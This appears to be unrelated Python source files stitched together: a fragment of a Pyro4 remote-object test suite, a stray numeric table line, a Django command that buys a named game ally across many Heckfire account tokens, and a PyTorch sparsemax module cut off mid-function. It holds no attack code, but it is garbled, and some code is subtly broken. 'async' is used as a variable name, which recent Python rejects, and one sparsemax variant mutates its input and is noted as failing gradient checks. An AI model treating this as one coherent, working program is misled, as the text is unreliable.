            self.assertEqual(expected_msg, str(e.exception))
    finally:
        Pyro4.config.REQUIRE_EXPOSE = old_require

def testProperties(self):
    """Only exposed properties appear in metadata; private names are rejected."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        _ = p.value
        # metadata should be loaded now
        self.assertEqual({"value", "dictionary"}, p._pyroAttrs)
        with self.assertRaises(AttributeError):
            _ = p.something
        with self.assertRaises(AttributeError):
            _ = p._dictionary
        with self.assertRaises(AttributeError):
            _ = p._value
        self.assertEqual(12345, p.value)
        self.assertEqual({"number": 42}, p.dictionary)
def testHasAttr(self):
    """hasattr() is only meaningful on a proxy when metadata is enabled."""
    try:
        Pyro4.config.METADATA = False
        with Pyro4.core.Proxy(self.objectUri) as p:
            # with metadata off, all attributes are considered valid (and return a RemoteMethod object)
            self.assertTrue(hasattr(p, "multiply"))
            self.assertTrue(hasattr(p, "oneway_multiply"))
            self.assertTrue(hasattr(p, "value"))
            self.assertTrue(hasattr(p, "_value"))
            self.assertTrue(hasattr(p, "_dictionary"))
            self.assertTrue(hasattr(p, "non_existing_attribute"))
        Pyro4.config.METADATA = True
        with Pyro4.core.Proxy(self.objectUri) as p:
            # with metadata on, hasattr actually gives proper results
            self.assertTrue(hasattr(p, "multiply"))
            self.assertTrue(hasattr(p, "oneway_multiply"))
            self.assertTrue(hasattr(p, "value"))
            self.assertFalse(hasattr(p, "_value"))
            self.assertFalse(hasattr(p, "_dictionary"))
            self.assertFalse(hasattr(p, "non_existing_attribute"))
    finally:
        Pyro4.config.METADATA = True

def testProxyMetadataKnown(self):
    """Manually pre-set metadata is overwritten when the proxy binds."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        # unconnected proxies have empty metadata
        self.assertEqual(set(), p._pyroAttrs)
        self.assertEqual(set(), p._pyroMethods)
        self.assertEqual(set(), p._pyroOneway)
        # set some metadata manually, they should be overwritten at connection time
        p._pyroMethods = set("abc")
        p._pyroAttrs = set("xyz")
        p._pyroBind()
        self.assertNotEqual(set("xyz"), p._pyroAttrs)
        self.assertNotEqual(set("abc"), p._pyroMethods)
        self.assertNotEqual(set(), p._pyroOneway)

def testNonserializableException_other(self):
    """A server exception that cannot be serialized surfaces as a PyroError."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        try:
            p.nonserializableException()
            self.fail("should crash")
        except Exception:
            xt, xv, tb = sys.exc_info()
            self.assertTrue(issubclass(xt, Pyro4.errors.PyroError))
            tblines = "\n".join(Pyro4.util.getPyroTraceback())
            self.assertTrue("unsupported serialized class" in tblines)

def testNonserializableException_pickle(self):
    """Same as above but via the pickle serializer, which reports differently."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        Pyro4.config.SERIALIZER = "pickle"
        try:
            p.nonserializableException()
            self.fail("should crash")
        except Exception:
            xt, xv, tb = sys.exc_info()
            self.assertTrue(issubclass(xt, Pyro4.errors.PyroError))
            tblines = "\n".join(Pyro4.util.getPyroTraceback())
            self.assertTrue("PyroError: Error serializing exception" in tblines)
            # module path of the original error differs depending on how tests were started
            s1 = "Original exception: <class 'testsupport.NonserializableError'>:"
            s2 = "Original exception: <class 'PyroTests.testsupport.NonserializableError'>:"
            self.assertTrue(s1 in tblines or s2 in tblines)
            self.assertTrue("raise NonserializableError((\"xantippe" in tblines)
        finally:
            Pyro4.config.SERIALIZER = "serpent"
def testBatchProxy(self):
    """Batched calls queue up (returning None) and yield results lazily; an error ends the batch."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        batch = Pyro4.batch(p)
        self.assertIsNone(batch.multiply(7, 6))
        self.assertIsNone(batch.divide(999, 3))
        self.assertIsNone(batch.ping())
        self.assertIsNone(batch.divide(999, 0))  # force an exception here
        self.assertIsNone(batch.multiply(3, 4))  # this call should not be performed after the error
        results = batch()
        self.assertEqual(42, next(results))
        self.assertEqual(333, next(results))
        self.assertIsNone(next(results))
        self.assertRaises(ZeroDivisionError, next, results)  # 999//0 should raise this error
        self.assertRaises(StopIteration, next, results)  # no more results should be available after the error
def testAsyncProxy(self):
    """Async proxy calls return a future-like result immediately; .value blocks until completion."""
    # NOTE(review): 'async' became a reserved word in Python 3.7; this code targets older interpreters.
    with Pyro4.core.Proxy(self.objectUri) as p:
        async = Pyro4.async(p)
        async._pyroBind()  # force that any metadata is processed
        begin = time.time()
        result = async.delayAndId(1, 42)
        duration = time.time() - begin
        self.assertTrue(duration < 0.1)
        self.assertFalse(result.ready)
        self.assertFalse(result.wait(0.5))  # not available within 0.5 sec
        self.assertEqual("slept for 42", result.value)
        self.assertTrue(result.ready)
        self.assertTrue(result.wait())

def testAsyncProxyCallchain(self):
    """then() callbacks chain on an async result; each callback runs exactly once, in order."""
    class FuncHolder(object):
        count = threadutil.AtomicCounter()

        def function(self, value, increase=1):
            self.count.incr()
            return value + increase
    with Pyro4.core.Proxy(self.objectUri) as p:
        async = Pyro4.async(p)
        async._pyroBind()  # force that any metadata is processed
        holder = FuncHolder()
        begin = time.time()
        result = async.multiply(2, 3)
        result.then(holder.function, increase=10) \
            .then(holder.function, increase=5) \
            .then(holder.function)
        duration = time.time() - begin
        self.assertTrue(duration < 0.1)
        value = result.value
        self.assertTrue(result.ready)
        # 2*3=6, then +10, +5, +1 (default increase) = 22
        self.assertEqual(22, value)
        self.assertEqual(3, holder.count.value)
def testBatchOneway(self):
    """A oneway batch returns immediately with no results, even when calls sleep server-side."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        batch = Pyro4.batch(p)
        self.assertIsNone(batch.multiply(7, 6))
        self.assertIsNone(batch.delay(1))  # a delay shouldn't matter with oneway
        self.assertIsNone(batch.multiply(3, 4))
        begin = time.time()
        results = batch(oneway=True)
        duration = time.time() - begin
        self.assertTrue(duration < 0.1, "oneway batch with delay should return almost immediately")
        self.assertIsNone(results)

def testBatchAsync(self):
    """An async batch returns immediately; results are fetched later through the async result."""
    # NOTE(review): 'async' as a keyword argument is a syntax error on Python 3.7+.
    with Pyro4.core.Proxy(self.objectUri) as p:
        batch = Pyro4.batch(p)
        self.assertIsNone(batch.multiply(7, 6))
        self.assertIsNone(batch.delay(1))  # a delay shouldn't matter with async
        self.assertIsNone(batch.multiply(3, 4))
        begin = time.time()
        asyncresult = batch(async=True)
        duration = time.time() - begin
        self.assertTrue(duration < 0.1, "async batch with delay should return almost immediately")
        results = asyncresult.value
        self.assertEqual(42, next(results))
        self.assertEqual("slept 1 seconds", next(results))
        self.assertEqual(12, next(results))
        self.assertRaises(StopIteration, next, results)  # no more results should be available

def testBatchAsyncCallchain(self):
    """then() callbacks applied to an async batch result transform the whole result sequence."""
    class FuncHolder(object):
        count = threadutil.AtomicCounter()

        def function(self, values):
            result = [value + 1 for value in values]
            self.count.incr()
            return result
    with Pyro4.core.Proxy(self.objectUri) as p:
        batch = Pyro4.batch(p)
        self.assertIsNone(batch.multiply(7, 6))
        self.assertIsNone(batch.multiply(3, 4))
        result = batch(async=True)
        holder = FuncHolder()
        result.then(holder.function).then(holder.function)
        value = result.value
        self.assertTrue(result.ready)
        # [42, 12] incremented once per chained callback
        self.assertEqual([44, 14], value)
        self.assertEqual(2, holder.count.value)
def testPyroTracebackNormal(self):
    """getPyroTraceback() includes the remote traceback for a regular remote error."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        try:
            p.divide(999, 0)  # force error here
            self.fail("expected error")
        except ZeroDivisionError:
            # going to check if the magic pyro traceback attribute is available for batch methods too
            tb = "".join(Pyro4.util.getPyroTraceback())
            self.assertIn("Remote traceback:", tb)  # validate if remote tb is present
            self.assertIn("ZeroDivisionError", tb)  # the error
            self.assertIn("return x // y", tb)  # the statement

def testPyroTracebackBatch(self):
    """Remote tracebacks are also available for errors raised out of a batched call."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        batch = Pyro4.batch(p)
        self.assertIsNone(batch.divide(999, 0))  # force an exception here
        results = batch()
        try:
            next(results)
            self.fail("expected error")
        except ZeroDivisionError:
            # going to check if the magic pyro traceback attribute is available for batch methods too
            tb = "".join(Pyro4.util.getPyroTraceback())
            self.assertIn("Remote traceback:", tb)  # validate if remote tb is present
            self.assertIn("ZeroDivisionError", tb)  # the error
            self.assertIn("return x // y", tb)  # the statement
        self.assertRaises(StopIteration, next, results)  # no more results should be available after the error
def testAutoProxy(self):
    """AUTOPROXY=True serializes registered pyro objects as proxies; unregistered/disabled stay plain."""
    obj = ServerTestObject()
    Pyro4.config.SERIALIZER = "pickle"
    try:
        with Pyro4.core.Proxy(self.objectUri) as p:
            Pyro4.config.AUTOPROXY = False  # make sure autoproxy is disabled
            result = p.echo(obj)
            self.assertIsInstance(result, ServerTestObject)
            self.daemon.register(obj)
            result = p.echo(obj)
            self.assertIsInstance(result, ServerTestObject, "with autoproxy off the object should be an instance of the class")
            self.daemon.unregister(obj)
            result = p.echo(obj)
            self.assertIsInstance(result, ServerTestObject, "serialized object must still be normal object")
            Pyro4.config.AUTOPROXY = True  # make sure autoproxying is enabled
            result = p.echo(obj)
            self.assertIsInstance(result, ServerTestObject, "non-pyro object must be returned as normal class")
            self.daemon.register(obj)
            result = p.echo(obj)
            self.assertIsInstance(result, Pyro4.core.Proxy, "serialized pyro object must be a proxy")
            self.daemon.unregister(obj)
            result = p.echo(obj)
            self.assertIsInstance(result, ServerTestObject, "unregistered pyro object must be normal class again")
            # note: the custom serializer may still be active but it should be smart enough to see
            # that the object is no longer a pyro object, and therefore, no proxy should be created.
    finally:
        # restore the global defaults regardless of outcome
        Pyro4.config.AUTOPROXY = True
        Pyro4.config.SERIALIZER = "serpent"
def testConnectOnce(self):
    """_pyroBind() connects on the first call only; later binds reuse the existing connection."""
    with Pyro4.core.Proxy(self.objectUri) as proxy:
        self.assertTrue(proxy._pyroBind(), "first bind should always connect")
        self.assertFalse(proxy._pyroBind(), "second bind should not connect again")

def testConnectingThreads(self):
    """Many threads binding one shared proxy concurrently must produce exactly one new connection."""
    class ConnectingThread(threadutil.Thread):
        new_connections = threadutil.AtomicCounter()

        def __init__(self, proxy, event):
            threadutil.Thread.__init__(self)
            self.proxy = proxy
            self.event = event
            self.setDaemon(True)
            self.new_connections.reset()

        def run(self):
            self.event.wait()  # all threads start binding at the same moment
            if self.proxy._pyroBind():
                ConnectingThread.new_connections.incr()  # 1 more new connection done
    with Pyro4.core.Proxy(self.objectUri) as proxy:
        event = threadutil.Event()
        threads = [ConnectingThread(proxy, event) for _ in range(20)]
        for t in threads:
            t.start()
        event.set()
        for t in threads:
            t.join()
        self.assertEqual(1, ConnectingThread.new_connections.value)  # proxy shared among threads must still have only 1 connect done
def testMaxMsgSize(self):
    """Messages exceeding MAX_MESSAGE_SIZE raise ProtocolError; 0 restores unlimited size."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        bigobject = [42] * 1000
        result = p.echo(bigobject)
        self.assertEqual(result, bigobject)
        Pyro4.config.MAX_MESSAGE_SIZE = 999
        try:
            _ = p.echo(bigobject)
            self.fail("should fail with ProtocolError msg too large")
        except Pyro4.errors.ProtocolError:
            pass
        Pyro4.config.MAX_MESSAGE_SIZE = 0  # back to unlimited

def testCleanup(self):
    """Daemon shutdown must succeed even while client connections are still open."""
    p1 = Pyro4.core.Proxy(self.objectUri)
    p2 = Pyro4.core.Proxy(self.objectUri)
    p3 = Pyro4.core.Proxy(self.objectUri)
    p1.echo(42)
    p2.echo(42)
    p3.echo(42)
    # we have several active connections still up, see if we can cleanly shutdown the daemon
    # (it should interrupt the worker's socket connections)
    time.sleep(0.1)
    self.daemon.shutdown()
    self.daemon = None
    p1._pyroRelease()
    p2._pyroRelease()
    p3._pyroRelease()
class ServerTestsThreadNoTimeout(unittest.TestCase):
    """Client/server integration tests against a live daemon (threaded server, no comm timeout).

    A daemon with one registered ServerTestObject is started in a background
    thread for every test; subclasses override SERVERTYPE/COMMTIMEOUT to run
    the same suite in other server configurations.
    """
    SERVERTYPE = "thread"  # daemon server type under test
    COMMTIMEOUT = None  # no communication timeout by default

    def setUp(self):
        """Start a daemon in a background thread and register one test object."""
        Pyro4.config.LOGWIRE = True
        Pyro4.config.POLLTIMEOUT = 0.1
        Pyro4.config.SERVERTYPE = self.SERVERTYPE
        Pyro4.config.COMMTIMEOUT = self.COMMTIMEOUT
        Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
        self.daemon = Pyro4.core.Daemon(port=0)
        obj = ServerTestObject()
        uri = self.daemon.register(obj, "something")
        self.objectUri = uri
        self.daemonthread = DaemonLoopThread(self.daemon)
        self.daemonthread.start()
        self.daemonthread.running.wait()
        time.sleep(0.05)  # give the daemon loop a moment to come up

    def tearDown(self):
        """Shut the daemon down and restore global config defaults."""
        time.sleep(0.05)
        self.daemon.shutdown()
        self.daemonthread.join()
        Pyro4.config.SERVERTYPE = "thread"
        Pyro4.config.COMMTIMEOUT = None
        Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")

    def testConnectionStuff(self):
        """Connections are created lazily, survive repeated releases, and rebind cleanly."""
        p1 = Pyro4.core.Proxy(self.objectUri)
        p2 = Pyro4.core.Proxy(self.objectUri)
        self.assertIsNone(p1._pyroConnection)
        self.assertIsNone(p2._pyroConnection)
        p1.ping()
        p2.ping()
        _ = p1.multiply(11, 5)
        _ = p2.multiply(11, 5)
        self.assertIsNotNone(p1._pyroConnection)
        self.assertIsNotNone(p2._pyroConnection)
        # releasing twice must be harmless
        p1._pyroRelease()
        p1._pyroRelease()
        p2._pyroRelease()
        p2._pyroRelease()
        self.assertIsNone(p1._pyroConnection)
        self.assertIsNone(p2._pyroConnection)
        p1._pyroBind()
        _ = p1.multiply(11, 5)
        _ = p2.multiply(11, 5)
        self.assertIsNotNone(p1._pyroConnection)
        self.assertIsNotNone(p2._pyroConnection)
        self.assertEqual("PYRO", p1._pyroUri.protocol)
        self.assertEqual("PYRO", p2._pyroUri.protocol)
        p1._pyroRelease()
        p2._pyroRelease()

    def testReconnectAndCompression(self):
        """_pyroReconnect restores a connection; COMPRESSION round-trips data correctly."""
        # try reconnects
        with Pyro4.core.Proxy(self.objectUri) as p:
            self.assertIsNone(p._pyroConnection)
            p._pyroReconnect(tries=100)
            self.assertIsNotNone(p._pyroConnection)
        self.assertIsNone(p._pyroConnection)  # leaving the with-block releases the connection
        # test compression:
        try:
            with Pyro4.core.Proxy(self.objectUri) as p:
                Pyro4.config.COMPRESSION = True
                self.assertEqual(55, p.multiply(5, 11))
                self.assertEqual("*" * 1000, p.multiply("*" * 500, 2))
        finally:
            Pyro4.config.COMPRESSION = False

    def testOnewayMetaOn(self):
        """With metadata on, oneway flags come from the server and cannot be faked locally."""
        Pyro4.config.METADATA = True
        with Pyro4.core.Proxy(self.objectUri) as p:
            self.assertEqual(set(), p._pyroOneway)  # when not bound, no meta info exchange has been done
            p._pyroBind()
            self.assertIn("oneway_multiply", p._pyroOneway)  # after binding, meta info has been processed
            self.assertEqual(55, p.multiply(5, 11))  # not tagged as @Pyro4.oneway
            self.assertIsNone(p.oneway_multiply(5, 11))  # tagged as @Pyro4.oneway
            p._pyroOneway = set()
            self.assertEqual(55, p.multiply(5, 11))
            self.assertEqual(55, p.oneway_multiply(5, 11))
            # check nonexisting method behavoir for oneway methods
            with self.assertRaises(AttributeError):
                p.nonexisting_method()
            p._pyroOneway.add("nonexisting_method")
            # now it should still fail because of metadata telling Pyro what methods actually exist
            with self.assertRaises(AttributeError):
                p.nonexisting_method()

    def testOnewayMetaOff(self):
        """With metadata off, oneway behavior is decided purely by the client-side _pyroOneway set."""
        Pyro4.config.METADATA = False
        with Pyro4.core.Proxy(self.objectUri) as p:
            self.assertEqual(set(), p._pyroOneway)  # when not bound, no meta info exchange has been done
            p._pyroBind()
            self.assertEqual(set(), p._pyroOneway)  # after binding, no meta info exchange has been done because disabled
            self.assertEqual(55, p.multiply(5, 11))
            self.assertEqual(55, p.oneway_multiply(5, 11))
            # check nonexisting method behavoir for oneway methods
            with self.assertRaises(AttributeError):
                p.nonexisting_method()
            p._pyroOneway.add("nonexisting_method")
            # now it shouldn't fail because of oneway semantics (!) (and becaue there's no metadata to tell Pyro that the method doesn't exist)
            p.nonexisting_method()
        Pyro4.config.METADATA = True

    def testOnewayWithProxySubclass(self):
        """A Proxy subclass may preset _pyroOneway; clearing the set restores normal calls."""
        Pyro4.config.METADATA = False
        class ProxyWithOneway(Pyro4.core.Proxy):
            def __init__(self, arg):
                super(ProxyWithOneway, self).__init__(arg)
                self._pyroOneway = {"oneway_multiply", "multiply"}
        with ProxyWithOneway(self.objectUri) as p:
            self.assertIsNone(p.oneway_multiply(5, 11))
            self.assertIsNone(p.multiply(5, 11))
            p._pyroOneway = set()
            self.assertEqual(55, p.oneway_multiply(5, 11))
            self.assertEqual(55, p.multiply(5, 11))
        Pyro4.config.METADATA = True

    def testOnewayDelayed(self):
        """ONEWAY_THREADED controls whether oneway calls run in their own server worker thread."""
        try:
            with Pyro4.core.Proxy(self.objectUri) as p:
                p.ping()
                Pyro4.config.ONEWAY_THREADED = True  # the default
                now = time.time()
                p.oneway_delay(1)  # oneway so we should continue right away
                self.assertTrue(time.time() - now < 0.2, "delay should be running as oneway")
                now = time.time()
                self.assertEqual(55, p.multiply(5, 11), "expected a normal result from a non-oneway call")
                self.assertTrue(time.time() - now < 0.2, "delay should be running in its own thread")
                # make oneway calls run in the server thread
                # we can change the config here and the server will pick it up on the fly
                Pyro4.config.ONEWAY_THREADED = False
                now = time.time()
                p.oneway_delay(1)  # oneway so we should continue right away
                self.assertTrue(time.time() - now < 0.2, "delay should be running as oneway")
                now = time.time()
                self.assertEqual(55, p.multiply(5, 11), "expected a normal result from a non-oneway call")
                self.assertFalse(time.time() - now < 0.2, "delay should be running in the server thread")
        finally:
            Pyro4.config.ONEWAY_THREADED = True  # back to normal

    def testSerializeConnected(self):
        """Serializing or copying a connected proxy yields an unconnected but fully usable clone."""
        # online serialization tests
        ser = Pyro4.util.get_serializer(Pyro4.config.SERIALIZER)
        proxy = Pyro4.core.Proxy(self.objectUri)
        proxy._pyroBind()
        self.assertIsNotNone(proxy._pyroConnection)
        p, _ = ser.serializeData(proxy)
        proxy2 = ser.deserializeData(p)
        self.assertIsNone(proxy2._pyroConnection)
        self.assertIsNotNone(proxy._pyroConnection)
        self.assertEqual(proxy2._pyroUri, proxy._pyroUri)
        proxy2._pyroBind()
        self.assertIsNotNone(proxy2._pyroConnection)
        self.assertIsNot(proxy2._pyroConnection, proxy._pyroConnection)
        proxy._pyroRelease()
        proxy2._pyroRelease()
        self.assertIsNone(proxy._pyroConnection)
        self.assertIsNone(proxy2._pyroConnection)
        proxy.ping()
        proxy2.ping()
        # try copying a connected proxy
        import copy
        proxy3 = copy.copy(proxy)
        self.assertIsNone(proxy3._pyroConnection)
        self.assertIsNotNone(proxy._pyroConnection)
        self.assertEqual(proxy3._pyroUri, proxy._pyroUri)
        self.assertIsNot(proxy3._pyroUri, proxy._pyroUri)
        proxy._pyroRelease()
        proxy2._pyroRelease()
        proxy3._pyroRelease()

    def testException(self):
        """Remote exceptions keep their original type and carry the remote traceback."""
        with Pyro4.core.Proxy(self.objectUri) as p:
            try:
                p.divide(1, 0)
            except:
                et, ev, tb = sys.exc_info()
                self.assertEqual(ZeroDivisionError, et)
                pyrotb = "".join(Pyro4.util.getPyroTraceback(et, ev, tb))
                self.assertIn("Remote traceback", pyrotb)
                self.assertIn("ZeroDivisionError", pyrotb)
                del tb  # avoid keeping a traceback reference cycle alive

    def testTimeoutCall(self):
        """A per-proxy _pyroTimeout aborts remote calls that take too long."""
        Pyro4.config.COMMTIMEOUT = None
        with Pyro4.core.Proxy(self.objectUri) as p:
            p.ping()
            start = time.time()
            p.delay(0.5)
            duration = time.time() - start
            self.assertTrue(0.4 < duration < 0.6)
            p._pyroTimeout = 0.1
            start = time.time()
            self.assertRaises(Pyro4.errors.TimeoutError, p.delay, 1)
            duration = time.time() - start
            if sys.platform != "cli":
                self.assertAlmostEqual(0.1, duration, places=1)
            else:
                # ironpython's time is weird
                self.assertTrue(0.0 < duration < 0.7)

    def testTimeoutConnect(self):
        """Calling a daemon that never serves its event loop produces a receive timeout."""
        # set up a unresponsive daemon
        with Pyro4.core.Daemon(port=0) as d:
            time.sleep(0.5)
            obj = ServerTestObject()
            uri = d.register(obj)
            # we're not going to start the daemon's event loop
            p = Pyro4.core.Proxy(uri)
            p._pyroTimeout = 0.2
            start = time.time()
            with self.assertRaises(Pyro4.errors.TimeoutError) as e:
                p.ping()
            self.assertEqual("receiving: timeout", str(e.exception))

    def testProxySharing(self):
        """One proxy shared by several threads must serve all of them without errors."""
        class SharedProxyThread(threadutil.Thread):
            def __init__(self, proxy):
                super(SharedProxyThread, self).__init__()
                self.proxy = proxy
                self.terminate = False
                self.error = True  # cleared only when the loop finishes cleanly
                self.setDaemon(True)

            def run(self):
                try:
                    while not self.terminate:
                        reply = self.proxy.multiply(5, 11)
                        assert reply == 55
                        time.sleep(0.001)
                    self.error = False
                except:
                    print("Something went wrong in the thread (SharedProxyThread):")
                    print("".join(Pyro4.util.getPyroTraceback()))
        with Pyro4.core.Proxy(self.objectUri) as p:
            threads = []
            for i in range(5):
                t = SharedProxyThread(p)
                threads.append(t)
                t.start()
            time.sleep(1)
            for t in threads:
                t.terminate = True
                t.join()
            for t in threads:
                self.assertFalse(t.error, "all threads should report no errors")

    def testServerConnections(self):
        """The server accepts a growing number of simultaneous client connections."""
        # check if the server allows to grow the number of connections
        proxies = [Pyro4.core.Proxy(self.objectUri) for _ in range(10)]
        try:
            for p in proxies:
                p._pyroTimeout = 0.5
                p._pyroBind()
            for p in proxies:
                p.ping()
        finally:
            for p in proxies:
                p._pyroRelease()

    def testServerParallelism(self):
        """Threaded servers run concurrent calls in parallel; multiplex servers serialize them."""
        class ClientThread(threadutil.Thread):
            def __init__(self, uri, name):
                super(ClientThread, self).__init__()
                self.setDaemon(True)
                self.proxy = Pyro4.core.Proxy(uri)
                self.name = name
                self.error = True  # cleared only on success
                self.proxy._pyroTimeout = 5.0
                self.proxy._pyroBind()

            def run(self):
                try:
                    reply = self.proxy.delayAndId(0.5, self.name)
                    assert reply == "slept for " + self.name
                    self.error = False
                finally:
                    self.proxy._pyroRelease()
        threads = []
        start = time.time()
        try:
            for i in range(6):
                t = ClientThread(self.objectUri, "t%d" % i)
                threads.append(t)
        except:
            # some exception (probably timeout) while creating clients
            # try to clean up some connections first
            for t in threads:
                t.proxy._pyroRelease()
            raise  # re-raise the exception
        for t in threads:
            t.start()
        for t in threads:
            t.join()
            self.assertFalse(t.error, "all threads should report no errors")
        del threads
        duration = time.time() - start
        if Pyro4.config.SERVERTYPE == "multiplex":
            # multiplex based server doesn't execute calls in parallel,
            # so 6 threads times 0.5 seconds =~ 3 seconds
            self.assertTrue(2.5 < duration < 3.5)
        else:
            # thread based server does execute calls in parallel,
            # so 6 threads taking 0.5 seconds =~ 0.5 seconds passed
            self.assertTrue(0.4 < duration < 0.9)
class ServerTestsMultiplexNoTimeout(ServerTestsThreadNoTimeout):
    """Re-run the full server test suite against the multiplex server type."""
    SERVERTYPE = "multiplex"
    COMMTIMEOUT = None

    def testProxySharing(self):
        # NOTE(review): disabled for the multiplex server -- presumably not applicable; confirm.
        pass

    def testException(self):
        # NOTE(review): disabled for the multiplex server -- presumably not applicable; confirm.
        pass
if __name__ == "__main__":
    # Run the whole suite when executed directly.
    # import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| 43,110 | 13,243 |
from django.core.management.base import BaseCommand, CommandError
from api import HeckfireApi, TokenException
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
    """Management command that buys ("vollies") a named ally on every configured account token."""
    help = 'Volly an ally via supplied username'

    def add_arguments(self, parser):
        # single positional argument: the ally's in-game username
        parser.add_argument('username', type=str)

    def handle(self, *args, **options):
        """
        Find an ally through the supplied username, then cycle through each
        configured token, purchasing the ally on each account.
        Usage: python manage.py volly_ally username "kevz"
        """
        staytoken = settings.STAY_ALIVE_TOKEN
        tokens = settings.TOKENS  # one API token per account
        username = options['username']
        for token in tokens:
            api = HeckfireApi(token=token, staytoken=staytoken)
            ally = api.get_ally_by_name(username)
            try:
                # an empty 'allies' list raises IndexError -> treated as "user does not exist" below
                user_id = ally['allies'][0]["user_id"]
                cost = ally['allies'][0]["cost"]
                try:
                    api.collect_loot()
                    api.buy_ally(user_id, cost)
                    api.stay_alive()
                    logger.info(f"Buying '{username}', ID: {user_id}, Cost: {cost}")
                except TokenException as e:
                    # token-specific failure; continue with the remaining accounts
                    logger.info(f"Exception: {e}")
            except IndexError as e:
                logger.info(f"User does not exist")
from typing import Any, Tuple, Union
import torch
import torch.nn as nn
from entmax import entmax_bisect
class _Sparsemax1(torch.autograd.Function):
    """Sparsemax autograd function (Martins & Astudillo, 2016).

    adapted from https://github.com/aced125/sparsemax/tree/master/sparsemax
    """

    @staticmethod
    def forward(ctx: Any, input: torch.Tensor, dim: int = -1) -> torch.Tensor:  # noqa
        """Project `input` onto the probability simplex along `dim` (Euclidean projection)."""
        input_dim = input.dim()
        if input_dim <= dim or dim < -input_dim:
            raise IndexError(
                f"Dimension out of range (expected to be in range of [-{input_dim}, {input_dim - 1}], but got {dim})"
            )
        # Save operating dimension to context
        ctx.needs_reshaping = input_dim > 2
        ctx.dim = dim
        if ctx.needs_reshaping:
            # operate on a 2-D view with the target dim last
            ctx, input = _Sparsemax1._flatten_all_but_nth_dim(ctx, input)
        # Translate by max for numerical stability
        input = input - input.max(-1, keepdim=True).values.expand_as(input)
        zs = input.sort(-1, descending=True).values
        range = torch.arange(1, input.size()[-1] + 1)  # NOTE(review): shadows the builtin 'range'
        range = range.expand_as(input).to(input)
        # Determine sparsity of projection: k(z) = max{k : 1 + k*z_k > cumsum(z)_k}
        bound = 1 + range * zs
        is_gt = bound.gt(zs.cumsum(-1)).type(input.dtype)
        k = (is_gt * range).max(-1, keepdim=True).values
        # Compute threshold
        zs_sparse = is_gt * zs
        # Compute taus
        taus = (zs_sparse.sum(-1, keepdim=True) - 1) / k
        taus = taus.expand_as(input)
        output = torch.max(torch.zeros_like(input), input - taus)
        # Save context
        ctx.save_for_backward(output)
        # Reshape back to original shape
        if ctx.needs_reshaping:
            ctx, output = _Sparsemax1._unflatten_all_but_nth_dim(ctx, output)
        return output

    @staticmethod
    def backward(ctx: Any, grad_output: torch.Tensor) -> Tuple[torch.Tensor, None]:  # noqa
        """Sparsemax JVP: gradient flows only through the support (nonzero outputs)."""
        output, *_ = ctx.saved_tensors
        # Reshape if needed
        if ctx.needs_reshaping:
            ctx, grad_output = _Sparsemax1._flatten_all_but_nth_dim(ctx, grad_output)
        # Compute gradient
        nonzeros = torch.ne(output, 0)
        num_nonzeros = nonzeros.sum(-1, keepdim=True)
        sum = (grad_output * nonzeros).sum(-1, keepdim=True) / num_nonzeros  # NOTE(review): shadows the builtin 'sum'
        grad_input = nonzeros * (grad_output - sum.expand_as(grad_output))
        # Reshape back to original shape
        if ctx.needs_reshaping:
            ctx, grad_input = _Sparsemax1._unflatten_all_but_nth_dim(ctx, grad_input)
        return grad_input, None

    @staticmethod
    def _flatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
        """
        Flattens tensor in all but 1 chosen dimension.
        Saves necessary context for backward pass and unflattening.
        """
        # transpose batch and nth dim
        x = x.transpose(0, ctx.dim)
        # Get and save original size in context for backward pass
        original_size = x.size()
        ctx.original_size = original_size
        # Flatten all dimensions except nth dim
        x = x.reshape(x.size(0), -1)
        # Transpose flattened dimensions to 0th dim, nth dim to last dim
        return ctx, x.transpose(0, -1)

    @staticmethod
    def _unflatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
        """
        Unflattens tensor using necessary context
        """
        # Tranpose flattened dim to last dim, nth dim to 0th dim
        x = x.transpose(0, 1)
        # Reshape to original size
        x = x.reshape(ctx.original_size)
        # Swap batch dim and nth dim
        return ctx, x.transpose(0, ctx.dim)
class _Sparsemax2(torch.autograd.Function):
    # credits to Yandex https://github.com/Qwicen/node/blob/master/lib/nn_utils.py
    # TODO this version fails gradient checking - refer to tests - check why?
    """
    An implementation of sparsemax (Martins & Astudillo, 2016). See
    :cite:`DBLP:journals/corr/MartinsA16` for detailed description.
    By Ben Peters and Vlad Niculae
    """

    @staticmethod
    def forward(ctx, input, dim=-1):  # noqa
        """sparsemax: normalizing sparse transform (a la softmax)
        Parameters
        ----------
        ctx : torch.autograd.function._ContextMethodMixin
        input : torch.Tensor
            any shape
        dim : int
            dimension along which to apply sparsemax
        Returns
        -------
        output : torch.Tensor
            same shape as input
        """
        ctx.dim = dim
        max_val, _ = input.max(dim=dim, keepdim=True)
        # NOTE(review): this subtracts in place and therefore mutates the caller's tensor
        input -= max_val  # same numerical stability trick as for softmax
        tau, supp_size = _Sparsemax2._threshold_and_support(input, dim=dim)
        output = torch.clamp(input - tau, min=0)
        ctx.save_for_backward(supp_size, output)
        return output

    @staticmethod
    def backward(ctx, grad_output):  # noqa
        """Backward pass: subtract the support-mean of the gradient on the support."""
        supp_size, output = ctx.saved_tensors
        dim = ctx.dim
        grad_input = grad_output.clone()
        grad_input[output == 0] = 0
        v_hat = grad_input.sum(dim=dim) / supp_size.to(output.dtype).squeeze()
        v_hat = v_hat.unsqueeze(dim)
        grad_input = torch.where(output != 0, grad_input - v_hat, grad_input)
        return grad_input, None

    @staticmethod
    def _threshold_and_support(input, dim=-1):
        """Sparsemax building block: compute the threshold
        Parameters
        ----------
        input: torch.Tensor
            any dimension
        dim : int
            dimension along which to apply the sparsemax
        Returns
        -------
        tau : torch.Tensor
            the threshold value
        support_size : torch.Tensor
        """
        input_srt, _ = torch.sort(input, descending=True, dim=dim)
        input_cumsum = input_srt.cumsum(dim) - 1
